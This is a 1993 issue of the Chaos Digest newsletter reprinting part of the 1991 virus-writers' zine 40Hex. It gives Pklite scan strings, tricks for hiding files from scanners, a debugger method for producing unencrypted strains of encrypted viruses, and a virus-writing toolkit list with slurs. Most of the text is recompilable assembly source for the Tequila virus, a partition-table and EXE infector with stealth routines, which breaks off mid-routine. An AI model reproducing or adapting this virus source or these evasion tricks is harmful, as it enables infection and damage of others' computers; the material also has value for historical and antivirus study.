Chaos Digest Mercredi 2 Juin 1993 Volume 1 : Numero 43

Chaos Digest Mercredi 2 Juin 1993 Volume 1 : Numero 43
ISSN 1244-4901

Editeur: Jean-Bernard Condat ([email protected])
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.43 (2 Juin 1993)
File 1--40H VMag Issue 1 Volume 4 #009-012(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
[email protected]
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: [email protected] (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 4 #009-012(1) (reprint)

40Hex Issue 4 December 1991

Hacked Pklite File Scanning
+++++++++++++++++++++++++++

In issue two, i belive it was. I release a method of making Pklite
files un-uncompressable and un-detectable. Well seems a few people
used the trick for wrong doing. What do I mean by wrong doing you
ask? Well lets just say lame trojans and such.

Anyway, I had a few sysops on my ass about the trick and so, so now I
am must release.... The hacked Pklite scanning strings. Well I
could really give a fuck if someones BBS gets crashed, but then again
I am freinds with a lot of sysops. And besides I have a new trick
anyway :)

Well there are two strings. One for .EXE files and one for .COM
files. And here they are.

+----------------------------------------------------------------------

"01 F0 FF 50 00 00 00 03 01" Pklite EXE
"53 33 DB 53 CB 03 01" Pklite COM

+----------------------------------------------------------------------

What's my new trick??? Well I won't reveal it at this point... But here
is a another compression trick. It lets you compress a file with Pklite
then again with LZExe.

First
+----

Compress the file with Pklite

Next
+---

Compress the file with LZExe

It wont let you cause the file becomes bigger...

But
+--

Use the DOS Undelete function to undelete the file ?zexe.tmp. Thats the
twice compressed file. Rename it to what you want. Destroy the LZ
header... And there you have it...

+++++

40Hex Issue 4 December 1991

A Further Look Into Cracking Encrypted Virues
+++++++++++++++++++++++++++++++++++++++++++++

In Censor #1, Rabids' Data Disruptor showed a way to decrypt
encrypted viruses. The only problem with the method shown is that
once you decrypt the virus, it cannot be run without modification.
I wish to take his theory a little farther, with a different approch.

There is a really simple way around the problem. What you will
need is a debugger. I perfer Turbo Debugger, by Borland. However
if you are good at the DOS utility Debug, you may be able to follow along.

The routine to unencrypt is simple, really simple. What you will
need to do is make a small target file for the virus to infect. A
100 byte of less file is perfered.

Step One
+-------

Copy the target file to a different filename to make two copies of
the file. Example - COPY TARGET.COM DUDE.COM

Step Two
+-------

Infect one of the files, however the virus infectes the file.
Remember just infect one of the files.

Step Three
+---------

Load up you dubugger (I'm gonna give Turbo Debugger steps, so people
with Debug and the Microsoft Debugger will have to improvise) and
get ready to single step through the virus.

Step Four
+--------

Start single stepping through the virus. If the virus is encrypted
you will hit a loop somwhere near the beginning of the code. In
most cases this is an XOR loop. It will look something like this...

add si, [1234]
mov di, si
mov cx, 0123 ;this would be the virus size to unencrypt
mov al, [0105] ;this is the encryption value's offset or the
;actual encryption value if no brackets are
;around it
cli ;auto increment
lodsb ;load byte from si position
xor ah, al ;xor byte at si
stosb ;store it a di (same as si)
loop 0110 ;loop until cx=0 NOTE: 0110 will be an offset
ret ;return when done

Where the "*" is, will be either the location of the encryption
value, or the actual encryption value if no brackets are around it.
If there are no brackets, keep that number in mind. Otherwise write
the offset down.

Step Five
+--------

When the encryption procedure is done the virus is then unencrypted.
If you were to write the virus to disk now, it would not run. Cause
as soon as the virus runs it encrypts itself and then jumps into the
encrypted code.

Follow the program to the part where the virus is about to write the
virus to the host program. It will again call on the encryption
routine.

Here it is again, but this time, before it XORs anything load the
encryption value with 0's. If it is a bytes value load it with 00,
if it is a word value load it with 0000 as in...

add si, [1234]
mov di, si
mov cx, 0123 ;this would be the virus size to unencrypt
mov al, 00 ;change the encryption value to zero, thus the
;encryption will not take place at all. Instead
;the virus will produce an original strain.
cli ;auto increment
lodsb ;load byte from si position
xor ah, al ;xor byte at si
stosb ;store it a di (same as si)
loop 0110 ;loop until cx=0 NOTE: 0110 will be an offset
ret ;return when done

Now run the program at full speed. The next file the virus infects
will be unencrypted, and executable.

NOTE: This method will work only for the types of viruses that use
this type of encryption. Mainly non-resident .COM and .EXE
infectors. In other words, don't go thinking this trick will work
on Whale or anything.

+++++

40Hex Issue 4 December 1991

The Ultimate Virus Programmers Toolkit
++++++++++++++++++++++++++++++++++++++

Just thought it would be funny to list what I think is the ulitmate virus
programmers toolkit. Theroys may vary.

- Turbo Assembler (MASM sucks, and it is slow)
- Turbo Debugger (It rules, what else can I say?)
- Quick Edit (Small, Fast and Turbo-like keys)
- Sourcer 486 (The ONLY real dissembler out)
- Virus Scan by McAffe Asst. (It really is a great tool)
- VSUM (Patti Hoffman is a stupid bitch, but I must admit, this
program is the virus underground bible)
- VSAFE from Central Point Anti-Virus (Not as annoying as Flu-Shot)
- Pklite Proffesional (If you don't have it - get it)
- Norton 6.0 (Diskedit alone is worth the d/l time)
- Pc-Backup by Central Point (we all fuck up sooner or later)
- MEMWALK.EXE (great shareware program, like diskedit for memory)
- Teledisk (for boot block virus saves)
- Trunc - by Skism Programming (Electronic file shredder)
- Microsoft Press Quick Reference Series
- DOS Functions (INT 20 - 26)
- ROM and BIOS functions (INT 10, 15 - 16)
- MS DOS extentions (Expaned, extended memory interupts)
- _Undocumented DOS_ or any current text file on the subject-
- 40HEX magazine (Well I do have good stuff here, sometimes)
- Dark Angel's Phunky Virus writing guide (pretty hard to come by.
He expalins stuff well)
- The following source code
- Leprosy-B (beginers only on this one, none-the-less)
- Cancer (well documented, intermediate)
- Tiny-F (not bad intro to .COM infections)
- Dark Avenger (well availible and excellent tips on .EXE
infection)
- Stoned II (boot block intro)
- Secure 2.0 (I got the source to this. It is a virus
detection system from the guy who wrote
1260, Mark Washburn. The source has some
great examples on debug trapping, TSR
skills, and encryption)
- IBM Scan source (I have this too, it's funny... Kinda
like McAfee's SCAN but lamer. By
David Chess)
- An account on the Bulgerian Virus Exchange +359-220-4198
- An account on a BBS with Fido-Nets' virus echo (keep track of your
latest score)
- Many accounts on the Homebase BBS (408) 988-4004 2400 bps
(408) 988-5138 HST 9600
(408) 988-5190 v32 9600
(Tell Areyh I sent ya')
- Scientific Calculator (Hex aint easy)
- Vivaren (Helps you break night, or any other controlled substance)
- Food, smokes, or whatever your vice is...

That'll do it...

+++++

40Hex Issue 4 December 1991

The Tequila Virus Source
++++++++++++++++++++++++

Nuff' said.

----------------------------------------------------------------------------
;=============================
; the tequila virus =
; a recompilable =
; dis-assembly =
; specifically designed =
; for assembly to a COM file =
; with the A86 assembler. =
; ++++++++++++++++++ =
; If you desire a "perfect" =
; byte for byte source code =
;match-up, the MASM assembler=
; must be used and the noted =
;instructions must be changed=
; to comply with MASM syntax.=
; In addition, all byte and =
;word pointer references must=
; be changed from B and W to =
; BYTE POINTER and WORD =
; POINTER. =
;=============================

CODE_SEG SEGMENT
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
ORG 0100
TEQUILA PROC NEAR

JMP START

DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH

DB 00DH, 00AH, 00DH, 00AH
DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
DB "Switzerland.", 00DH, 00AH
DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
DB "$"

DB "Execute: mov ax, FE03 / int 21. Key to go on!"

PROGRAM_TERMINATION_ROUTINE:
PUSH BP
MOV BP,SP
SUB SP,0CH
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS
PUSH CS
POP DS
MOV AX,W[6]
INC AX
JE 0243H ;Masm Mod. Needed
DEC AX
JNE 020DH ;Masm Mod. Needed
DEC W[8] ;Masm Mod. Needed
JNE 0243H ;Masm Mod. Needed
JMP 0246H ;Masm Mod. Needed
MOV AH,02AH
CALL INT_21
MOV SI,CX
MOV CX,W[8]
CMP CL,DL
JNE 022FH ;Masm Mod. Needed
MOV AX,SI
SUB AX,W[6]
MUL B[011H] ;Masm Mod. Needed
ADD AL,DH
ADD CH,3
CMP AL,CH
JAE 0237H ;Masm Mod. Needed
MOV W[6],0FFFFH ;Masm Mod. Needed
JMP 0243H ;Masm Mod. Needed
MOV W[6],0 ;Masm Mod. Needed
MOV W[8],3 ;Masm Mod. Needed
JMP 02DF ;Masm Mod. Needed
MOV BX,0B800H
INT 011
AND AX,030H
CMP AX,030H
JNE 0256H ;Masm Mod. Needed
MOV BX,0B000H
MOV ES,BX
XOR BX,BX
MOV DI,0FD8FH
MOV SI,0FC18H
MOV W[BP-2],SI
MOV W[BP-4],DI
MOV CX,01E
MOV AX,W[BP-2]
IMUL AX
MOV W[BP-8],AX
MOV W[BP-6],DX
MOV AX,W[BP-4]
IMUL AX
MOV W[BP-0C],AX
MOV W[BP-0A],DX
ADD AX,W[BP-8]
ADC DX,W[BP-6]
CMP DX,0F
JAE 02B0 ;Masm Mod. Needed
MOV AX,W[BP-2]
IMUL W[BP-4]
IDIV W[0F] ;Masm Mod. Needed
ADD AX,DI
MOV W[BP-4],AX
MOV AX,W[BP-8]
MOV DX,W[BP-6]
SUB AX,W[BP-0C]
SBB DX,W[BP-0A]
IDIV W[0D] ;Masm Mod. Needed
ADD AX,SI
MOV W[BP-2],AX
LOOP 0269 ;Masm Mod. Needed
INC CX
SHR CL,1
MOV CH,CL
MOV CL,0DB
ES MOV W[BX],CX ;Masm Mod. Needed
INC BX
INC BX
ADD SI,012
CMP SI,01B8
JL 0260 ;Masm Mod. Needed
ADD DI,034
CMP DI,02A3
JL 025D ;Masm Mod. Needed
XOR DI,DI
MOV SI,0BB
MOV CX,02D
CLD
MOVSB
INC DI
LOOP 02D7 ;Masm Mod. Needed
XOR AX,AX
INT 016
POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
MOV SP,BP
POP BP
RET

PRINT_MESSAGE:
PUSH DX
PUSH DS
PUSH CS
POP DS
MOV AH,9
MOV DX,012
CALL INT_21
POP DS
POP DX
RET

NEW_PARTITION_TABLE:
CLI
XOR BX,BX
MOV DS,BX
MOV SS,BX
MOV SP,07C00
STI
XOR DI,DI
SUB W[0413],3 ;Masm Mod. Needed
INT 012
MOV CL,6
SHL AX,CL
MOV ES,AX
PUSH ES
MOV AX,022A
PUSH AX
MOV AX,0205
MOV CX,W[07C30]
INC CX
MOV DX,W[07C32]
INT 013
RETF

DB 002, 0FE
DB 04C, 0E9
DB 080, 004

PUSH CS
POP DS
XOR AX,AX
MOV ES,AX
MOV BX,07C00
PUSH ES
PUSH BX
MOV AX,0201
MOV CX,W[0226]
MOV DX,W[0228]
INT 013
PUSH CS
POP ES
CLD
MOV SI,0409
MOV DI,09BE
MOV CX,046
REP MOVSB
MOV SI,091B
MOV DI,0A04
MOV CX,045
REP MOVSB
CLI
XOR AX,AX
MOV ES,AX
ES LES BX,[070] ;Masm Mod. Needed
MOV W[09B0],BX ;Masm Mod. Needed
MOV W[09B2],ES ;Masm Mod. Needed
MOV ES,AX
ES LES BX,[084] ;Masm Mod. Needed
MOV W[09B4],BX ;Masm Mod. Needed
MOV W[09B6],ES ;Masm Mod. Needed
MOV ES,AX
ES MOV W[070],044F ;Masm Mod. Needed
ES MOV W[072],DS ;Masm Mod. Needed
STI
RETF

INSTALL:
CALL NEXT_LINE
NEXT_LINE:
POP SI
SUB SI,028F
PUSH SI
PUSH AX
PUSH ES
PUSH CS
POP DS
MOV AX,ES
ADD W[SI+2],AX
ADD W[SI+4],AX
DEC AX
MOV ES,AX
MOV AX,0FE02
INT 021
CMP AX,01FD
JE NO_PARTITION_INFECTION
ES CMP B[0],05A ;Masm Mod. Needed
JNE NO_PARTITION_INFECTION
ES CMP W[3],0BB ;Masm Mod. Needed
JBE NO_PARTITION_INFECTION
ES MOV AX,W[012] ;Masm Mod. Needed
SUB AX,0BB
MOV ES,AX
XOR DI,DI
MOV CX,09A4
CLD
REP MOVSB
PUSH ES
POP DS
CALL INFECT_PARTITION_TABLE
NO_PARTITION_INFECTION:
POP ES
POP AX
PUSH ES
POP DS
POP SI
CS MOV SS,W[SI+4] ;Masm Mod. Needed
CHAIN_TO_THE_HOST_FILE:
CS JMP D[SI] ;Masm Mod. Needed

INFECT_PARTITION_TABLE:
MOV AH,02A
INT 021
MOV W[6],CX ;Masm Mod. Needed
MOV W[8],DX ;Masm Mod. Needed
MOV AH,052
INT 021
ES MOV AX,W[BX-2] ;Masm Mod. Needed
MOV W[03E8],AX ;Masm Mod. Needed
MOV AX,03513
INT 021
MOV W[09A0],BX ;Masm Mod. Needed
MOV W[09A2],ES ;Masm Mod. Needed
MOV AX,03501
INT 021
MOV SI,BX
MOV DI,ES
MOV AX,02501
MOV DX,03DA
INT 021
MOV B[0A],0 ;Masm Mod. Needed
PUSHF
POP AX
OR AX,0100
PUSH AX
POPF
MOV AX,0201
MOV BX,09A4
MOV CX,1
MOV DX,080
PUSH DS
POP ES
PUSHF
CALL D[09A0] ;Masm Mod. Needed
PUSHF
POP AX
AND AX,0FEFF
PUSH AX
POPF
PUSHF
MOV AX,02501
MOV DX,SI
MOV DS,DI
INT 021
POPF
JAE 0450 ;Masm Mod. Needed
JMP RET ;Masm Mod. Needed
PUSH ES
POP DS
CMP W[BX+02E],0FE02
JNE 045C ;Masm Mod. Needed
JMP RET ;Masm Mod. Needed
ADD BX,01BE
MOV CX,4
MOV AL,B[BX+4]
CMP AL,4
JE 0479 ;Masm Mod. Needed
CMP AL,6
JE 0479 ;Masm Mod. Needed
CMP AL,1
JE 0479 ;Masm Mod. Needed
ADD BX,010
LOOP 0463 ;Masm Mod. Needed
JMP SHORT RET ;Masm Mod. Needed
MOV DL,080
MOV DH,B[BX+5]
MOV W[0228],DX ;Masm Mod. Needed
MOV AX,W[BX+6]
MOV CX,AX
MOV SI,6
AND AX,03F
CMP AX,SI
JBE RET ;Masm Mod. Needed
SUB CX,SI
MOV DI,BX
INC CX
MOV W[0226],CX ;Masm Mod. Needed
MOV AX,0301
MOV BX,09A4
PUSHF
CALL D[09A0] ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
DEC CX
MOV W[DI+6],CX
INC CX
SUB W[DI+0C],SI
SBB W[DI+0E],0
MOV AX,0305
MOV BX,0
INC CX
PUSHF
CALL D[09A0] ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
MOV SI,01F6
MOV DI,09A4
MOV CX,034
CLD
REP MOVSB
MOV AX,0301
MOV BX,09A4
MOV CX,1
XOR DH,DH
PUSHF
CALL D[09A0] ;Masm Mod. Needed
RET

NEW_INTERRUPT_ONE:
PUSH BP
MOV BP,SP
CS CMP B[0A],1 ;Masm Mod. Needed
JE 0506 ;Masm Mod. Needed
CMP W[BP+4],09B4
JA 050B ;Masm Mod. Needed
PUSH AX
PUSH ES
LES AX,[BP+2]
CS MOV W[09A0],AX ;Masm Mod. Needed
CS MOV W[09A2],ES ;Masm Mod. Needed
CS MOV B[0A],1
POP ES
POP AX
AND W[BP+6],0FEFF
POP BP
IRET

NEW_INTERRUPT_13:
CMP CX,1
JNE 054E ;Masm Mod. Needed
CMP DX,080
JNE 054E ;Masm Mod. Needed
CMP AH,3
JA 054E ;Masm Mod. Needed
CMP AH,2
JB 054E ;Masm Mod. Needed
PUSH CX
PUSH DX
DEC AL
JE 0537 ;Masm Mod. Needed
PUSH AX
PUSH BX
ADD BX,0200
INC CX
PUSHF
CS CALL D[09A0] ;Masm Mod. Needed
POP BX
POP AX
MOV AL,1
CS MOV CX,W[0226] ;Masm Mod. Needed
CS MOV DX,W[0228] ;Masm Mod. Needed
PUSHF
CS CALL D[09A0] ;Masm Mod. Needed
POP DX
POP CX
RETF 2
CS JMP D[09A0] ;Masm Mod. Needed

NEW_TIMER_TICK_INTERRUPT:
PUSH AX
PUSH BX
PUSH ES
PUSH DS
XOR AX,AX
MOV ES,AX
PUSH CS
POP DS
ES LES BX,[084] ;Masm Mod. Needed
MOV AX,ES
CMP AX,0800
JA 05B0 ;Masm Mod. Needed
CMP AX,W[09B6]
JNE 0575 ;Masm Mod. Needed
CMP BX,W[09B4]
JE 05B0 ;Masm Mod. Needed
MOV W[09B4],BX ;Masm Mod. Needed
MOV W[09B6],ES ;Masm Mod. Needed
XOR AX,AX
MOV DS,AX
CS LES BX,[09B0] ;Masm Mod. Needed
MOV W[070],BX ;Masm Mod. Needed
MOV W[072],ES ;Masm Mod. Needed
LES BX,[04C] ;Masm Mod. Needed
CS MOV W[09A0],BX ;Masm Mod. Needed
CS MOV W[09A2],ES ;Masm Mod. Needed
MOV W[04C],09BE ;Masm Mod. Needed
MOV W[04E],CS ;Masm Mod. Needed
MOV W[084],04B1 ;Masm Mod. Needed
MOV W[086],CS ;Masm Mod. Needed
POP DS
POP ES
POP BX
POP AX
IRET

INT_21_INTERCEPT:
CMP AH,011
JB CHECK_FOR_HANDLE
CMP AH,012
JA CHECK_FOR_HANDLE
CALL ADJUST_FCB_MATCHES
RETF 2
CHECK_FOR_HANDLE:
CMP AH,04E
JB CHECK_FOR_PREVIOUS_INSTALLATION
CMP AH,04F
JA CHECK_FOR_PREVIOUS_INSTALLATION
CALL ADJUST_HANDLE_MATCHES
RETF 2
CHECK_FOR_PREVIOUS_INSTALLATION:
CMP AX,0FE02
JNE CHECK_FOR_MESSAGE_PRINT
NOT AX
IRET
CHECK_FOR_MESSAGE_PRINT:
CMP AX,0FE03
JNE CHECK_FOR_EXECUTE
CS CMP W[6],0 ;Masm Mod. Needed
JNE CHAIN_TO_TRUE_INT_21
CALL PRINT_MESSAGE
IRET
CHECK_FOR_EXECUTE:
CMP AX,04B00
JE SET_STACK
CMP AH,04C
JNE CHAIN_TO_TRUE_INT_21
SET_STACK:
CS MOV W[09A6],SP ;Masm Mod. Needed
CS MOV W[09A8],SS ;Masm Mod. Needed
CLI
PUSH CS
POP SS
MOV SP,0AE5
STI
CMP AH,04C
JNE TO_AN_INFECTION
CALL PROGRAM_TERMINATION_ROUTINE
JMP SHORT NO_INFECTION
TO_AN_INFECTION:
CALL INFECT_THE_FILE
NO_INFECTION:
CLI
CS MOV SS,W[09A8] ;Masm Mod. Needed
CS MOV SP,W[09A6] ;Masm Mod. Needed
STI
JMP SHORT CHAIN_TO_TRUE_INT_21
CHAIN_TO_TRUE_INT_21:
CS INC W[09BC] ;Masm Mod. Needed
CS JMP D[09B4] ;Masm Mod. Needed

NEW_CRITICAL_ERROR_HANDLER:
MOV AL,3
IRET

ADJUST_FCB_MATCHES:
PUSH BX
PUSH ES
PUSH AX
MOV AH,02F
CALL INT_21
POP AX
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
PUSHF
PUSH AX
CMP AL,0FF
JE 0664 ;Masm Mod. Needed
ES CMP B[BX],0FF ;Masm Mod. Needed
JNE 064F ;Masm Mod. Needed
ADD BX,7
ES MOV AL,B[BX+017] ;Masm Mod. Needed
AND AL,01F
CMP AL,01F
JNE 0664 ;Masm Mod. Needed
ES SUB W[BX+01D],09A4 ;Masm Mod. Needed
ES SBB W[BX+01F],0 ;Masm Mod. Needed
POP AX
POPF
POP ES
POP BX
RET

ADJUST_HANDLE_MATCHES:
PUSH BX
PUSH ES
PUSH AX
MOV AH,02F
CALL INT_21
POP AX
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
PUSHF
PUSH AX
JB 0691 ;Masm Mod. Needed
ES MOV AL,B[BX+016] ;Masm Mod. Needed
AND AL,01F
CMP AL,01F
JNE 0691 ;Masm Mod. Needed
ES SUB W[BX+01A],09A4 ;Masm Mod. Needed
ES SBB W[BX+01C],0 ;Masm Mod. Needed
POP AX
POPF
POP ES
POP BX
RET

WRITE_TO_THE_FILE:
MOV AH,040
JMP 069C ;Masm Mod. Needed

READ_FROM_THE_FILE:
MOV AH,03F
CALL 06B4 ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
SUB AX,CX
RET

MOVE_TO_END_OF_FILE:
XOR CX,CX
XOR DX,DX
MOV AX,04202
JMP 06B4 ;Masm Mod. Needed

MOVE_TO_BEGINNING_OF_FILE:
XOR CX,CX
XOR DX,DX
MOV AX,04200
CS MOV BX,W[09A4] ;Masm Mod. Needed

INT_21:
CLI
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
RET

INFECT_THE_FILE:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS
CALL CHECK_LETTERS_IN_FILENAME
JAE GOOD_NAME
JMP BAD_NAME

GOOD_NAME:
PUSH DX
PUSH DS
PUSH CS
POP DS

SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
MOV AX,03524
CALL INT_21
MOV W[09B8],BX ;Masm Mod. Needed
MOV W[09BA],ES ;Masm Mod. Needed
MOV AX,02524
MOV DX,052A
CALL INT_21
POP DS
POP DX

SAVE_AND_REPLACE_FILE_ATTRIBUTE:
MOV AX,04300
CALL INT_21
CS MOV W[09AA],CX ;Masm Mod. Needed
JAE 06FE ;Masm Mod. Needed
JMP RESTORE_CRIT_HANDLER
MOV AX,04301
XOR CX,CX
CALL INT_21
JB 077C ;Masm Mod. Needed

OPEN_FILE_FOR_READ_WRITE:
MOV AX,03D02
CALL INT_21
JB 0771 ;Masm Mod. Needed
PUSH DX
PUSH DS
PUSH CS
POP DS
MOV W[09A4],AX ;Masm Mod. Needed

GET_FILEDATE:
MOV AX,05700
CALL 06B4 ;Masm Mod. Needed
JB 075C ;Masm Mod. Needed
MOV W[09AC],DX ;Masm Mod. Needed
MOV W[09AE],CX ;Masm Mod. Needed

READ_AND_CHECK_EXE_HEADER:
CALL 06AD ;Masm Mod. Needed
MOV DX,0A49
MOV CX,01C
CALL 069A ;Masm Mod. Needed
JB 075C ;Masm Mod. Needed
PUSH DS
POP ES
MOV DI,0E8
MOV CX,020
CMP W[0A49],05A4D ;Masm Mod. Needed
JNE 075C ;Masm Mod. Needed
MOV AX,W[0A5B]
CLD
REPNE SCASW
JNE 0754 ;Masm Mod. Needed
OR W[09AE],01F ;Masm Mod. Needed
JMP 075C ;Masm Mod. Needed
CALL READ_PAST_END_OF_FILE
JB 075C ;Masm Mod. Needed
CALL ENCRYPT_AND_WRITE_TO_FILE

RESTORE_ALTERED_DATE:
MOV AX,05701
MOV DX,W[09AC]
MOV CX,W[09AE]
CALL 06B4 ;Masm Mod. Needed

CLOSE_THE_FILE:
MOV AH,03E
CALL 06B4 ;Masm Mod. Needed

RESTORE_FILE_ATTRIBUTE:
POP DS
POP DX
MOV AX,04301
CS MOV CX,W[09AA] ;Masm Mod. Needed
CALL INT_21

RESTORE_CRIT_HANDLER:
MOV AX,02524
CS LDS DX,[09B8] ;Masm Mod. Needed
CALL INT_21

BAD_NAME:
POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RET

CHECK_LETTERS_IN_FILENAME:
PUSH DS
POP ES
MOV DI,DX
MOV CX,-1
XOR AL,AL
CLD
REPNE SCASB
NOT CX
MOV DI,DX
MOV AX,04353
MOV SI,CX
SCASW
JE 07B7 ;Masm Mod. Needed
DEC DI
LOOP 07A5 ;Masm Mod. Needed
MOV CX,SI
MOV DI,DX
MOV AL,056
REPNE SCASB
JE 07B7 ;Masm Mod. Needed
CLC
RET
STC
RET

READ_PAST_END_OF_FILE:
MOV CX,-1
MOV DX,-0A
CALL 06A8 ;Masm Mod. Needed
MOV DX,0A65
MOV CX,8
CALL 069A ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
CMP W[0A65],0FDF0 ;Masm Mod. Needed
JNE 07F0 ;Masm Mod. Needed
CMP W[0A67],0AAC5 ;Masm Mod. Needed
JNE 07F0 ;Masm Mod. Needed
MOV CX,-1
MOV DX,-9
CALL 06A8 ;Masm Mod. Needed
MOV DX,0A6B
MOV CX,4
CALL 0696 ;Masm Mod. Needed
RET
CLC
RET

ENCRYPT_AND_WRITE_TO_FILE:
CALL MOVE_TO_END_OF_FILE
MOV SI,AX
MOV DI,DX
MOV BX,0A49
MOV AX,W[BX+4]
MUL W[0D] ;Masm Mod. Needed
SUB AX,SI
SBB DX,DI
JAE 080C ;Masm Mod. Needed
JMP OUT_OF_ENCRYPT
MOV AX,W[BX+8]
MUL W[0B] ;Masm Mod. Needed
SUB SI,AX
SBB DI,DX
MOV AX,W[BX+0E]
MOV W[4],AX ;Masm Mod. Needed
ADD W[4],010 ;Masm Mod. Needed
MUL W[0B] ;Masm Mod. Needed
ADD AX,W[BX+010]
SUB AX,SI
SBB DX,DI
JB 083C ;Masm Mod. Needed
SUB AX,080
SBB DX,0
JB RET ;Masm Mod. Needed
ADD W[BX+0E],09B
MOV AX,W[BX+016]
ADD AX,010
MOV W[2],AX ;Masm Mod. Needed
MOV AX,W[BX+014]
MOV W[0],AX ;Masm Mod. Needed
CALL 06A4 ;Masm Mod. Needed
ADD AX,09A4
ADC DX,0
DIV W[0D] ;Masm Mod. Needed
INC AX
MOV W[0A4D],AX ;Masm Mod. Needed
MOV W[0A4B],DX ;Masm Mod. Needed
MOV DX,DI
MOV AX,SI
DIV W[0B] ;Masm Mod. Needed
MOV W[0A5F],AX ;Masm Mod. Needed
MOV BX,DX
ADD DX,0960
MOV W[0A5D],DX ;Masm Mod. Needed
CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
JB RET ;Masm Mod. Needed
OR W[09AE],01F ;Masm Mod. Needed
MOV BX,W[09BC]
AND BX,01F
SHL BX,1
MOV AX,W[BX+0E8]
MOV W[0A5B],AX ;Masm Mod. Needed
CALL MOVE_TO_BEGINNING_OF_FILE
MOV CX,01C
MOV DX,0A49

------------------------------

End of Chaos Digest #1.43
************************************